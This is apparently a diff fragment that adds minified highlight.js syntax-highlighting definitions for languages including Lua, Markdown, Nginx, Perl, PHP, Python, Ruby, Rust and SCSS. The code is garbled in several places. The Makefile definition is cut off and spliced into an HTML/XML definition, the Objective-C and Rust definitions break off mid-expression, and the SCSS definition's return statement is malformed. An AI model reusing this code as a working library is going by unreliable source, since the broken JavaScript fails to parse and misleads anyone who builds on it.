+hljs.registerLanguage("lua",function(){"use strict";return function(e){var t={begin:"\\[=*\\[",end:"\\]=*\\]",contains:["self"]},a=[e.COMMENT("--(?!\\[=*\\[)","$"),e.COMMENT("--\\[=*\\[","\\]=*\\]",{contains:[t],relevance:10})];return{name:"Lua",keywords:{$pattern:e.UNDERSCORE_IDENT_RE,literal:"true false nil",keyword:"and break do else elseif end for goto if in local not or repeat return then until while",built_in:"_G _ENV _VERSION __index __newindex __mode __call __metatable __tostring __len __gc __add __sub __mul __div __mod __pow __concat __unm __eq __lt __le assert collectgarbage dofile error getfenv getmetatable ipairs load loadfile loadstring module next pairs pcall print rawequal rawget rawset require select setfenv setmetatable tonumber tostring type unpack xpcall arg self coroutine resume yield status wrap create running debug getupvalue debug sethook getmetatable gethook setmetatable setlocal traceback setfenv getinfo setupvalue getlocal getregistry getfenv io lines write close flush open output type read stderr stdin input stdout popen tmpfile math log max acos huge ldexp pi cos tanh pow deg tan cosh sinh random randomseed frexp ceil floor rad abs sqrt modf asin min mod fmod log10 atan2 exp sin atan os exit setlocale date getenv difftime remove time clock tmpname rename execute package preload loadlib loaded loaders cpath config path seeall string sub upper len gfind rep find match char dump gmatch reverse byte format gsub lower table setn insert getn foreachi maxn foreach concat sort remove"},contains:a.concat([{className:"function",beginKeywords:"function",end:"\\)",contains:[e.inherit(e.TITLE_MODE,{begin:"([_a-zA-Z]\\w*\\.)*([_a-zA-Z]\\w*:)?[_a-zA-Z]\\w*"}),{className:"params",begin:"\\(",endsWithParent:!0,contains:a}].concat(a)},e.C_NUMBER_MODE,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{className:"string",begin:"\\[=*\\[",end:"\\]=*\\]",contains:[t],relevance:5}])}}}());
+hljs.registerLanguage("makefile",function(){"use strict";return function(e){var i={className:"variable",variants:[{begin:"\\$\\("+e.UNDERSCORE_IDENT_RE+"\\)",contains:[e.BACKSLASH_ESCAPE]},{begin:/\$[@%`]+/}]}]}]};return{name:"HTML, XML",aliases:["html","xhtml","rss","atom","xjb","xsd","xsl","plist","wsf","svg"],case_insensitive:!0,contains:[{className:"meta",begin:"",relevance:10,contains:[a,i,t,s,{begin:"\\[",end:"\\]",contains:[{className:"meta",begin:"",contains:[a,s,i,t]}]}]},e.COMMENT("\x3c!--","--\x3e",{relevance:10}),{begin:"<\\!\\[CDATA\\[",end:"\\]\\]>",relevance:10},n,{className:"meta",begin:/<\?xml/,end:/\?>/,relevance:10},{className:"tag",begin:")",end:">",keywords:{name:"style"},contains:[c],starts:{end:"",returnEnd:!0,subLanguage:["css","xml"]}},{className:"tag",begin:")",end:">",keywords:{name:"script"},contains:[c],starts:{end:"<\/script>",returnEnd:!0,subLanguage:["javascript","handlebars","xml"]}},{className:"tag",begin:"",contains:[{className:"name",begin:/[^\/><\s]+/,relevance:0},c]}]}}}());
+hljs.registerLanguage("markdown",function(){"use strict";return function(n){const e={begin:"<",end:">",subLanguage:"xml",relevance:0},a={begin:"\\[.+?\\][\\(\\[].*?[\\)\\]]",returnBegin:!0,contains:[{className:"string",begin:"\\[",end:"\\]",excludeBegin:!0,returnEnd:!0,relevance:0},{className:"link",begin:"\\]\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0},{className:"symbol",begin:"\\]\\[",end:"\\]",excludeBegin:!0,excludeEnd:!0}],relevance:10},i={className:"strong",contains:[],variants:[{begin:/_{2}/,end:/_{2}/},{begin:/\*{2}/,end:/\*{2}/}]},s={className:"emphasis",contains:[],variants:[{begin:/\*(?!\*)/,end:/\*/},{begin:/_(?!_)/,end:/_/,relevance:0}]};i.contains.push(s),s.contains.push(i);var c=[e,a];return i.contains=i.contains.concat(c),s.contains=s.contains.concat(c),{name:"Markdown",aliases:["md","mkdown","mkd"],contains:[{className:"section",variants:[{begin:"^#{1,6}",end:"$",contains:c=c.concat(i,s)},{begin:"(?=^.+?\\n[=-]{2,}$)",contains:[{begin:"^[=-]*$"},{begin:"^",end:"\\n",contains:c}]}]},e,{className:"bullet",begin:"^[ \t]*([*+-]|(\\d+\\.))(?=\\s+)",end:"\\s+",excludeEnd:!0},i,s,{className:"quote",begin:"^>\\s+",contains:c,end:"$"},{className:"code",variants:[{begin:"(`{3,})(.|\\n)*?\\1`*[ ]*"},{begin:"(~{3,})(.|\\n)*?\\1~*[ ]*"},{begin:"```",end:"```+[ ]*$"},{begin:"~~~",end:"~~~+[ ]*$"},{begin:"`.+?`"},{begin:"(?=^( {4}|\\t))",contains:[{begin:"^( {4}|\\t)",end:"(\\n)$"}],relevance:0}]},{begin:"^[-\\*]{3,}",end:"$"},a,{begin:/^\[[^\n]+\]:/,returnBegin:!0,contains:[{className:"symbol",begin:/\[/,end:/\]/,excludeBegin:!0,excludeEnd:!0},{className:"link",begin:/:\s*/,end:/$/,excludeBegin:!0}]}]}}}());
+hljs.registerLanguage("nginx",function(){"use strict";return function(e){var n={className:"variable",variants:[{begin:/\$\d+/},{begin:/\$\{/,end:/}/},{begin:"[\\$\\@]"+e.UNDERSCORE_IDENT_RE}]},a={endsWithParent:!0,keywords:{$pattern:"[a-z/_]+",literal:"on off yes no true false none blocked debug info notice warn error crit select break last permanent redirect kqueue rtsig epoll poll /dev/poll"},relevance:0,illegal:"=>",contains:[e.HASH_COMMENT_MODE,{className:"string",contains:[e.BACKSLASH_ESCAPE,n],variants:[{begin:/"/,end:/"/},{begin:/'/,end:/'/}]},{begin:"([a-z]+):/",end:"\\s",endsWithParent:!0,excludeEnd:!0,contains:[n]},{className:"regexp",contains:[e.BACKSLASH_ESCAPE,n],variants:[{begin:"\\s\\^",end:"\\s|{|;",returnEnd:!0},{begin:"~\\*?\\s+",end:"\\s|{|;",returnEnd:!0},{begin:"\\*(\\.[a-z\\-]+)+"},{begin:"([a-z\\-]+\\.)+\\*"}]},{className:"number",begin:"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}(:\\d{1,5})?\\b"},{className:"number",begin:"\\b\\d+[kKmMgGdshdwy]*\\b",relevance:0},n]};return{name:"Nginx config",aliases:["nginxconf"],contains:[e.HASH_COMMENT_MODE,{begin:e.UNDERSCORE_IDENT_RE+"\\s+{",returnBegin:!0,end:"{",contains:[{className:"section",begin:e.UNDERSCORE_IDENT_RE}],relevance:0},{begin:e.UNDERSCORE_IDENT_RE+"\\s",end:";|{",returnBegin:!0,contains:[{className:"attribute",begin:e.UNDERSCORE_IDENT_RE,starts:a}],relevance:0}],illegal:"[^\\s\\}]"}}}());
+hljs.registerLanguage("objectivec",function(){"use strict";return function(e){var n=/[a-zA-Z@][a-zA-Z0-9_]*/,_={$pattern:n,keyword:"@interface @class @protocol @implementation"};return{name:"Objective-C",aliases:["mm","objc","obj-c"],keywords:{$pattern:n,keyword:"int float while char export sizeof typedef const struct for union unsigned long volatile static bool mutable if do return goto void enum else break extern asm case short default double register explicit signed typename this switch continue wchar_t inline readonly assign readwrite self @synchronized id typeof nonatomic super unichar IBOutlet IBAction strong weak copy in out inout bycopy byref oneway __strong __weak __block __autoreleasing @private @protected @public @try @property @end @throw @catch @finally @autoreleasepool @synthesize @dynamic @selector @optional @required @encode @package @import @defs @compatibility_alias __bridge __bridge_transfer __bridge_retained __bridge_retain __covariant __contravariant __kindof _Nonnull _Nullable _Null_unspecified __FUNCTION__ __PRETTY_FUNCTION__ __attribute__ getter setter retain unsafe_unretained nonnull nullable null_unspecified null_resettable class instancetype NS_DESIGNATED_INITIALIZER NS_UNAVAILABLE NS_REQUIRES_SUPER NS_RETURNS_INNER_POINTER NS_INLINE NS_AVAILABLE NS_DEPRECATED NS_ENUM NS_OPTIONS NS_SWIFT_UNAVAILABLE NS_ASSUME_NONNULL_BEGIN NS_ASSUME_NONNULL_END NS_REFINED_FOR_SWIFT NS_SWIFT_NAME NS_SWIFT_NOTHROW NS_DURING NS_HANDLER NS_ENDHANDLER NS_VALUERETURN NS_VOIDRETURN",literal:"false true FALSE TRUE nil YES NO NULL",built_in:"BOOL dispatch_once_t dispatch_queue_t dispatch_sync dispatch_async dispatch_once"},illegal:"/,end:/$/,illegal:"\\n"},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{className:"class",begin:"("+_.keyword.split(" ").join("|")+")\\b",end:"({|$)",excludeEnd:!0,keywords:_,contains:[e.UNDERSCORE_TITLE_MODE]},{begin:"\\."+e.UNDERSCORE_IDENT_RE,relevance:0}]}}}());
+hljs.registerLanguage("perl",function(){"use strict";return function(e){var n={$pattern:/[\w.]+/,keyword:"getpwent getservent quotemeta msgrcv scalar kill dbmclose undef lc ma syswrite tr send umask sysopen shmwrite vec qx utime local oct semctl localtime readpipe do return format read sprintf dbmopen pop getpgrp not getpwnam rewinddir qq fileno qw endprotoent wait sethostent bless s|0 opendir continue each sleep endgrent shutdown dump chomp connect getsockname die socketpair close flock exists index shmget sub for endpwent redo lstat msgctl setpgrp abs exit select print ref gethostbyaddr unshift fcntl syscall goto getnetbyaddr join gmtime symlink semget splice x|0 getpeername recv log setsockopt cos last reverse gethostbyname getgrnam study formline endhostent times chop length gethostent getnetent pack getprotoent getservbyname rand mkdir pos chmod y|0 substr endnetent printf next open msgsnd readdir use unlink getsockopt getpriority rindex wantarray hex system getservbyport endservent int chr untie rmdir prototype tell listen fork shmread ucfirst setprotoent else sysseek link getgrgid shmctl waitpid unpack getnetbyname reset chdir grep split require caller lcfirst until warn while values shift telldir getpwuid my getprotobynumber delete and sort uc defined srand accept package seekdir getprotobyname semop our rename seek if q|0 chroot sysread setpwent no crypt getc chown sqrt write setnetent setpriority foreach tie sin msgget map stat getlogin unless elsif truncate exec keys glob tied closedir ioctl socket readlink eval xor readline binmode setservent eof ord bind alarm pipe atan2 getgrent exp time push setgrent gt lt or ne m|0 break given say state when"},t={className:"subst",begin:"[$@]\\{",end:"\\}",keywords:n},s={begin:"->{",end:"}"},r={variants:[{begin:/\$\d/},{begin:/[\$%@](\^\w\b|#\w+(::\w+)*|{\w+}|\w+(::\w*)*)/},{begin:/[\$%@][^\s\w{]/,relevance:0}]},i=[e.BACKSLASH_ESCAPE,t,r],a=[r,e.HASH_COMMENT_MODE,e.COMMENT("^\\=\\w","\\=cut",{endsWithParent:!0}),s,{className:"string",contains:i,variants:[{begin:"q[qwxr]?\\s*\\(",end:"\\)",relevance:5},{begin:"q[qwxr]?\\s*\\[",end:"\\]",relevance:5},{begin:"q[qwxr]?\\s*\\{",end:"\\}",relevance:5},{begin:"q[qwxr]?\\s*\\|",end:"\\|",relevance:5},{begin:"q[qwxr]?\\s*\\<",end:"\\>",relevance:5},{begin:"qw\\s+q",end:"q",relevance:5},{begin:"'",end:"'",contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"'},{begin:"`",end:"`",contains:[e.BACKSLASH_ESCAPE]},{begin:"{\\w+}",contains:[],relevance:0},{begin:"-?\\w+\\s*\\=\\>",contains:[],relevance:0}]},{className:"number",begin:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",relevance:0},{begin:"(\\/\\/|"+e.RE_STARTERS_RE+"|\\b(split|return|print|reverse|grep)\\b)\\s*",keywords:"split return print reverse grep",relevance:0,contains:[e.HASH_COMMENT_MODE,{className:"regexp",begin:"(s|tr|y)/(\\\\.|[^/])*/(\\\\.|[^/])*/[a-z]*",relevance:10},{className:"regexp",begin:"(m|qr)?/",end:"/[a-z]*",contains:[e.BACKSLASH_ESCAPE],relevance:0}]},{className:"function",beginKeywords:"sub",end:"(\\s*\\(.*?\\))?[;{]",excludeEnd:!0,relevance:5,contains:[e.TITLE_MODE]},{begin:"-\\w\\b",relevance:0},{begin:"^__DATA__$",end:"^__END__$",subLanguage:"mojolicious",contains:[{begin:"^@@.*",end:"$",className:"comment"}]}];return t.contains=a,s.contains=a,{name:"Perl",aliases:["pl","pm"],keywords:n,contains:a}}}());
+hljs.registerLanguage("php",function(){"use strict";return function(e){var r={begin:"\\$+[a-zA-Z_-ÿ][a-zA-Z0-9_-ÿ]*"},t={className:"meta",variants:[{begin:/<\?php/,relevance:10},{begin:/<\?[=]?/},{begin:/\?>/}]},a={className:"string",contains:[e.BACKSLASH_ESCAPE,t],variants:[{begin:'b"',end:'"'},{begin:"b'",end:"'"},e.inherit(e.APOS_STRING_MODE,{illegal:null}),e.inherit(e.QUOTE_STRING_MODE,{illegal:null})]},n={variants:[e.BINARY_NUMBER_MODE,e.C_NUMBER_MODE]},i={keyword:"__CLASS__ __DIR__ __FILE__ __FUNCTION__ __LINE__ __METHOD__ __NAMESPACE__ __TRAIT__ die echo exit include include_once print require require_once array abstract and as binary bool boolean break callable case catch class clone const continue declare default do double else elseif empty enddeclare endfor endforeach endif endswitch endwhile eval extends final finally float for foreach from global goto if implements instanceof insteadof int integer interface isset iterable list new object or private protected public real return string switch throw trait try unset use var void while xor yield",literal:"false null true",built_in:"Error|0 AppendIterator ArgumentCountError ArithmeticError ArrayIterator ArrayObject AssertionError BadFunctionCallException BadMethodCallException CachingIterator CallbackFilterIterator CompileError Countable DirectoryIterator DivisionByZeroError DomainException EmptyIterator ErrorException Exception FilesystemIterator FilterIterator GlobIterator InfiniteIterator InvalidArgumentException IteratorIterator LengthException LimitIterator LogicException MultipleIterator NoRewindIterator OutOfBoundsException OutOfRangeException OuterIterator OverflowException ParentIterator ParseError RangeException RecursiveArrayIterator RecursiveCachingIterator RecursiveCallbackFilterIterator RecursiveDirectoryIterator RecursiveFilterIterator RecursiveIterator RecursiveIteratorIterator RecursiveRegexIterator RecursiveTreeIterator RegexIterator RuntimeException SeekableIterator SplDoublyLinkedList SplFileInfo SplFileObject SplFixedArray SplHeap SplMaxHeap SplMinHeap SplObjectStorage SplObserver SplObserver SplPriorityQueue SplQueue SplStack SplSubject SplSubject SplTempFileObject TypeError UnderflowException UnexpectedValueException ArrayAccess Closure Generator Iterator IteratorAggregate Serializable Throwable Traversable WeakReference Directory __PHP_Incomplete_Class parent php_user_filter self static stdClass"};return{aliases:["php","php3","php4","php5","php6","php7"],case_insensitive:!0,keywords:i,contains:[e.HASH_COMMENT_MODE,e.COMMENT("//","$",{contains:[t]}),e.COMMENT("/\\*","\\*/",{contains:[{className:"doctag",begin:"@[A-Za-z]+"}]}),e.COMMENT("__halt_compiler.+?;",!1,{endsWithParent:!0,keywords:"__halt_compiler"}),{className:"string",begin:/<<<['"]?\w+['"]?$/,end:/^\w+;?$/,contains:[e.BACKSLASH_ESCAPE,{className:"subst",variants:[{begin:/\$\w+/},{begin:/\{\$/,end:/\}/}]}]},t,{className:"keyword",begin:/\$this\b/},r,{begin:/(::|->)+[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/},{className:"function",beginKeywords:"fn function",end:/[;{]/,excludeEnd:!0,illegal:"[$%\\[]",contains:[e.UNDERSCORE_TITLE_MODE,{className:"params",begin:"\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0,keywords:i,contains:["self",r,e.C_BLOCK_COMMENT_MODE,a,n]}]},{className:"class",beginKeywords:"class interface",end:"{",excludeEnd:!0,illegal:/[:\(\$"]/,contains:[{beginKeywords:"extends implements"},e.UNDERSCORE_TITLE_MODE]},{beginKeywords:"namespace",end:";",illegal:/[\.']/,contains:[e.UNDERSCORE_TITLE_MODE]},{beginKeywords:"use",end:";",contains:[e.UNDERSCORE_TITLE_MODE]},{begin:"=>"},a,n]}}}());
+hljs.registerLanguage("php-template",function(){"use strict";return function(n){return{name:"PHP template",subLanguage:"xml",contains:[{begin:/<\?(php|=)?/,end:/\?>/,subLanguage:"php",contains:[{begin:"/\\*",end:"\\*/",skip:!0},{begin:'b"',end:'"',skip:!0},{begin:"b'",end:"'",skip:!0},n.inherit(n.APOS_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0}),n.inherit(n.QUOTE_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0})]}]}}}());
+hljs.registerLanguage("plaintext",function(){"use strict";return function(t){return{name:"Plain text",aliases:["text","txt"],disableAutodetect:!0}}}());
+hljs.registerLanguage("properties",function(){"use strict";return function(e){var n="[ \\t\\f]*",t="("+n+"[:=]"+n+"|[ \\t\\f]+)",a="([^\\\\:= \\t\\f\\n]|\\\\.)+",s={end:t,relevance:0,starts:{className:"string",end:/$/,relevance:0,contains:[{begin:"\\\\\\n"}]}};return{name:".properties",case_insensitive:!0,illegal:/\S/,contains:[e.COMMENT("^\\s*[!#]","$"),{begin:"([^\\\\\\W:= \\t\\f\\n]|\\\\.)+"+t,returnBegin:!0,contains:[{className:"attr",begin:"([^\\\\\\W:= \\t\\f\\n]|\\\\.)+",endsParent:!0,relevance:0}],starts:s},{begin:a+t,returnBegin:!0,relevance:0,contains:[{className:"meta",begin:a,endsParent:!0,relevance:0}],starts:s},{className:"attr",relevance:0,begin:a+n+"$"}]}}}());
+hljs.registerLanguage("python",function(){"use strict";return function(e){var n={keyword:"and elif is global as in if from raise for except finally print import pass return exec else break not with class assert yield try while continue del or def lambda async await nonlocal|10",built_in:"Ellipsis NotImplemented",literal:"False None True"},a={className:"meta",begin:/^(>>>|\.\.\.) /},i={className:"subst",begin:/\{/,end:/\}/,keywords:n,illegal:/#/},s={begin:/\{\{/,relevance:0},r={className:"string",contains:[e.BACKSLASH_ESCAPE],variants:[{begin:/(u|b)?r?'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,a],relevance:10},{begin:/(u|b)?r?"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,a],relevance:10},{begin:/(fr|rf|f)'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,a,s,i]},{begin:/(fr|rf|f)"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,a,s,i]},{begin:/(u|r|ur)'/,end:/'/,relevance:10},{begin:/(u|r|ur)"/,end:/"/,relevance:10},{begin:/(b|br)'/,end:/'/},{begin:/(b|br)"/,end:/"/},{begin:/(fr|rf|f)'/,end:/'/,contains:[e.BACKSLASH_ESCAPE,s,i]},{begin:/(fr|rf|f)"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,s,i]},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},l={className:"number",relevance:0,variants:[{begin:e.BINARY_NUMBER_RE+"[lLjJ]?"},{begin:"\\b(0o[0-7]+)[lLjJ]?"},{begin:e.C_NUMBER_RE+"[lLjJ]?"}]},t={className:"params",variants:[{begin:/\(\s*\)/,skip:!0,className:null},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,contains:["self",a,l,r,e.HASH_COMMENT_MODE]}]};return i.contains=[r,l,a],{name:"Python",aliases:["py","gyp","ipython"],keywords:n,illegal:/(<\/|->|\?)|=>/,contains:[a,l,{beginKeywords:"if",relevance:0},r,e.HASH_COMMENT_MODE,{variants:[{className:"function",beginKeywords:"def"},{className:"class",beginKeywords:"class"}],end:/:/,illegal:/[${=;\n,]/,contains:[e.UNDERSCORE_TITLE_MODE,t,{begin:/->/,endsWithParent:!0,keywords:"None"}]},{className:"meta",begin:/^[\t ]*@/,end:/$/},{begin:/\b(print|exec)\(/}]}}}());
+hljs.registerLanguage("python-repl",function(){"use strict";return function(n){return{aliases:["pycon"],contains:[{className:"meta",starts:{end:/ |$/,starts:{end:"$",subLanguage:"python"}},variants:[{begin:/^>>>(?=[ ]|$)/},{begin:/^\.\.\.(?=[ ]|$)/}]}]}}}());
+hljs.registerLanguage("ruby",function(){"use strict";return function(e){var n="[a-zA-Z_]\\w*[!?=]?|[-+~]\\@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?",a={keyword:"and then defined module in return redo if BEGIN retry end for self when next until do begin unless END rescue else break undef not super class case require yield alias while ensure elsif or include attr_reader attr_writer attr_accessor",literal:"true false nil"},s={className:"doctag",begin:"@[A-Za-z]+"},i={begin:"#<",end:">"},r=[e.COMMENT("#","$",{contains:[s]}),e.COMMENT("^\\=begin","^\\=end",{contains:[s],relevance:10}),e.COMMENT("^__END__","\\n$")],c={className:"subst",begin:"#\\{",end:"}",keywords:a},t={className:"string",contains:[e.BACKSLASH_ESCAPE,c],variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/`/,end:/`/},{begin:"%[qQwWx]?\\(",end:"\\)"},{begin:"%[qQwWx]?\\[",end:"\\]"},{begin:"%[qQwWx]?{",end:"}"},{begin:"%[qQwWx]?<",end:">"},{begin:"%[qQwWx]?/",end:"/"},{begin:"%[qQwWx]?%",end:"%"},{begin:"%[qQwWx]?-",end:"-"},{begin:"%[qQwWx]?\\|",end:"\\|"},{begin:/\B\?(\\\d{1,3}|\\x[A-Fa-f0-9]{1,2}|\\u[A-Fa-f0-9]{4}|\\?\S)\b/},{begin:/<<[-~]?'?(\w+)(?:.|\n)*?\n\s*\1\b/,returnBegin:!0,contains:[{begin:/<<[-~]?'?/},e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,contains:[e.BACKSLASH_ESCAPE,c]})]}]},b={className:"params",begin:"\\(",end:"\\)",endsParent:!0,keywords:a},d=[t,i,{className:"class",beginKeywords:"class module",end:"$|;",illegal:/=/,contains:[e.inherit(e.TITLE_MODE,{begin:"[A-Za-z_]\\w*(::\\w+)*(\\?|\\!)?"}),{begin:"<\\s*",contains:[{begin:"("+e.IDENT_RE+"::)?"+e.IDENT_RE}]}].concat(r)},{className:"function",beginKeywords:"def",end:"$|;",contains:[e.inherit(e.TITLE_MODE,{begin:n}),b].concat(r)},{begin:e.IDENT_RE+"::"},{className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"(\\!|\\?)?:",relevance:0},{className:"symbol",begin:":(?!\\s)",contains:[t,{begin:n}],relevance:0},{className:"number",begin:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",relevance:0},{begin:"(\\$\\W)|((\\$|\\@\\@?)(\\w+))"},{className:"params",begin:/\|/,end:/\|/,keywords:a},{begin:"("+e.RE_STARTERS_RE+"|unless)\\s*",keywords:"unless",contains:[i,{className:"regexp",contains:[e.BACKSLASH_ESCAPE,c],illegal:/\n/,variants:[{begin:"/",end:"/[a-z]*"},{begin:"%r{",end:"}[a-z]*"},{begin:"%r\\(",end:"\\)[a-z]*"},{begin:"%r!",end:"![a-z]*"},{begin:"%r\\[",end:"\\][a-z]*"}]}].concat(r),relevance:0}].concat(r);c.contains=d,b.contains=d;var g=[{begin:/^\s*=>/,starts:{end:"$",contains:d}},{className:"meta",begin:"^([>?]>|[\\w#]+\\(\\w+\\):\\d+:\\d+>|(\\w+-)?\\d+\\.\\d+\\.\\d(p\\d+)?[^>]+>)",starts:{end:"$",contains:d}}];return{name:"Ruby",aliases:["rb","gemspec","podspec","thor","irb"],keywords:a,illegal:/\/\*/,contains:r.concat(g).concat(d)}}}());
+hljs.registerLanguage("rust",function(){"use strict";return function(e){var n="([ui](8|16|32|64|128|size)|f(32|64))?",t="drop i8 i16 i32 i64 i128 isize u8 u16 u32 u64 u128 usize f32 f64 str char bool Box Option Result String Vec Copy Send Sized Sync Drop Fn FnMut FnOnce ToOwned Clone Debug PartialEq PartialOrd Eq Ord AsRef AsMut Into From Default Iterator Extend IntoIterator DoubleEndedIterator ExactSizeIterator SliceConcatExt ToString assert! assert_eq! bitflags! bytes! cfg! col! concat! concat_idents! debug_assert! debug_assert_eq! env! panic! file! format! format_args! include_bin! include_str! line! local_data_key! module_path! option_env! print! println! select! stringify! try! unimplemented! unreachable! vec! write! writeln! macro_rules! assert_ne! debug_assert_ne!";return{name:"Rust",aliases:["rs"],keywords:{$pattern:e.IDENT_RE+"!?",keyword:"abstract as async await become box break const continue crate do dyn else enum extern false final fn for if impl in let loop macro match mod move mut override priv pub ref return self Self static struct super trait true try type typeof unsafe unsized use virtual where while yield",literal:"true false Some None Ok Err",built_in:t},illegal:""}]}}}());
+hljs.registerLanguage("scss",function(){"use strict";return function(e){var t={className:"variable",begin:"(\\$[a-zA-Z-][a-zA-Z0-9_-]*)\\b"},i={className:"number",begin:"#[0-9A-Fa-f]+"};return e.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,e.C_BLOCK_COMMENT_MODE,{name:"SCSS",case_insensitive:!0,illegal:"[=/|']",contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"selector-id",begin:"\\#[A-Za-z0-9_-]+",relevance:0},{className:"selector-class",begin:"\\.[A-Za-z0-9_-]+",relevance:0},{className:"selector-attr",begin:"\\[",end:"\\]",illegal:"$"},{className:"selector-tag",begin:"\\b(a|abbr|acronym|address|area|article|aside|audio|b|base|big|blockquote|body|br|button|canvas|caption|cite|code|col|colgroup|command|datalist|dd|del|details|dfn|div|dl|dt|em|embed|fieldset|figcaption|figure|footer|form|frame|frameset|(h[1-6])|head|header|hgroup|hr|html|i|iframe|img|input|ins|kbd|keygen|label|legend|li|link|map|mark|meta|meter|nav|noframes|noscript|object|ol|optgroup|option|output|p|param|pre|progress|q|rp|rt|ruby|samp|script|section|select|small|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|time|title|tr|tt|ul|var|video)\\b",relevance:0},{className:"selector-pseudo",begin:":(visited|valid|root|right|required|read-write|read-only|out-range|optional|only-of-type|only-child|nth-of-type|nth-last-of-type|nth-last-child|nth-child|not|link|left|last-of-type|last-child|lang|invalid|indeterminate|in-range|hover|focus|first-of-type|first-line|first-letter|first-child|first|enabled|empty|disabled|default|checked|before|after|active)"},{className:"selector-pseudo",begin:"::(after|before|choices|first-letter|first-line|repeat-index|repeat-item|selection|value)"},t,{className:"attribute",begin:"\\b(src|z-index|word-wrap|word-spacing|word-break|width|widows|white-space|visibility|vertical-align|unicode-bidi|transition-timing-function|transition-property|transition-duration|transition-delay|transition|transform-style|transform-origin|transform|top|text-underline-position|text-transform|text-shadow|text-rendering|text-overflow|text-indent|text-decoration-style|text-decoration-line|text-decoration-color|text-decoration|text-align-last|text-align|tab-size|table-layout|right|resize|quotes|position|pointer-events|perspective-origin|perspective|page-break-inside|page-break-before|page-break-after|padding-top|padding-right|padding-left|padding-bottom|padding|overflow-y|overflow-x|overflow-wrap|overflow|outline-width|outline-style|outline-offset|outline-color|outline|orphans|order|opacity|object-position|object-fit|normal|none|nav-up|nav-right|nav-left|nav-index|nav-down|min-width|min-height|max-width|max-height|mask|marks|margin-top|margin-right|margin-left|margin-bottom|margin|list-style-type|list-style-position|list-style-image|list-style|line-height|letter-spacing|left|justify-content|initial|inherit|ime-mode|image-orientation|image-resolution|image-rendering|icon|hyphens|height|font-weight|font-variant-ligatures|font-variant|font-style|font-stretch|font-size-adjust|font-size|font-language-override|font-kerning|font-feature-settings|font-family|font|float|flex-wrap|flex-shrink|flex-grow|flex-flow|flex-direction|flex-basis|flex|filter|empty-cells|display|direction|cursor|counter-reset|counter-increment|content|column-width|column-span|column-rule-width|column-rule-style|column-rule-color|column-rule|column-gap|column-fill|column-count|columns|color|clip-path|clip|clear|caption-side|break-inside|break-before|break-after|box-sizing|box-shadow|box-decoration-break|bottom|border-width|border-top-width|border-top-style|border-top-right-radius|border-top-left-radius|border-top-color|border-top|border-style|border-spacing|border-right-width|border-right-style|border-right-color|border-right|border-radius|border-left-width|border-left-style|border-left-color|border-left|border-image-width|border-image-source|border-image-slice|border-image-repeat|border-image-outset|border-image|border-color|border-collapse|border-bottom-width|border-bottom-style|border-bottom-right-radius|border-bottom-left-radius|border-bottom-color|border-bottom|border|background-size|background-repeat|background-position|background-origin|background-image|background-color|background-clip|background-attachment|background-blend-mode|background|backface-visibility|auto|animation-timing-function|animation-play-state|animation-name|animation-iteration-count|animation-fill-mode|animation-duration|animation-direction|animation-delay|animation|align-self|align-items|align-content)\\b",illegal:"[^\\s]"},{begin:"\\b(whitespace|wait|w-resize|visible|vertical-text|vertical-ideographic|uppercase|upper-roman|upper-alpha|underline|transparent|top|thin|thick|text|text-top|text-bottom|tb-rl|table-header-group|table-footer-group|sw-resize|super|strict|static|square|solid|small-caps|separate|se-resize|scroll|s-resize|rtl|row-resize|ridge|right|repeat|repeat-y|repeat-x|relative|progress|pointer|overline|outside|outset|oblique|nowrap|not-allowed|normal|none|nw-resize|no-repeat|no-drop|newspaper|ne-resize|n-resize|move|middle|medium|ltr|lr-tb|lowercase|lower-roman|lower-alpha|loose|list-item|line|line-through|line-edge|lighter|left|keep-all|justify|italic|inter-word|inter-ideograph|inside|inset|inline|inline-block|inherit|inactive|ideograph-space|ideograph-parenthesis|ideograph-numeric|ideograph-alpha|horizontal|hidden|help|hand|groove|fixed|ellipsis|e-resize|double|dotted|distribute|distribute-space|distribute-letter|distribute-all-lines|disc|disabled|default|decimal|dashed|crosshair|collapse|col-resize|circle|char|center|capitalize|break-word|break-all|bottom|both|bolder|bold|block|bidi-override|below|baseline|auto|always|all-scroll|absolute|table|table-cell)\\b"},{begin:":",end:";",contains:[t,i,e.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,{className:"meta",begin:"!important"}]},{begin:"@(page|font-face)",lexemes:"@[a-z-]+",keywords:"@page @font-face"},{begin:"@",end:"[{;]",returnBegin:!0,keywords:"and or not only",contains:[{begin:"@[a-z-]+",className:"keyword"},t,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,i,e.CSS_NUMBER_MODE]}]}}}());
+hljs.registerLanguage("shell",function(){"use strict";return function(s){return{name:"Shell Session",aliases:["console"],contains:[{className:"meta",begin:"^\\s{0,3}[/\\w\\d\\[\\]()@-]*[>%$#]",starts:{end:"$",subLanguage:"bash"}}]}}}());
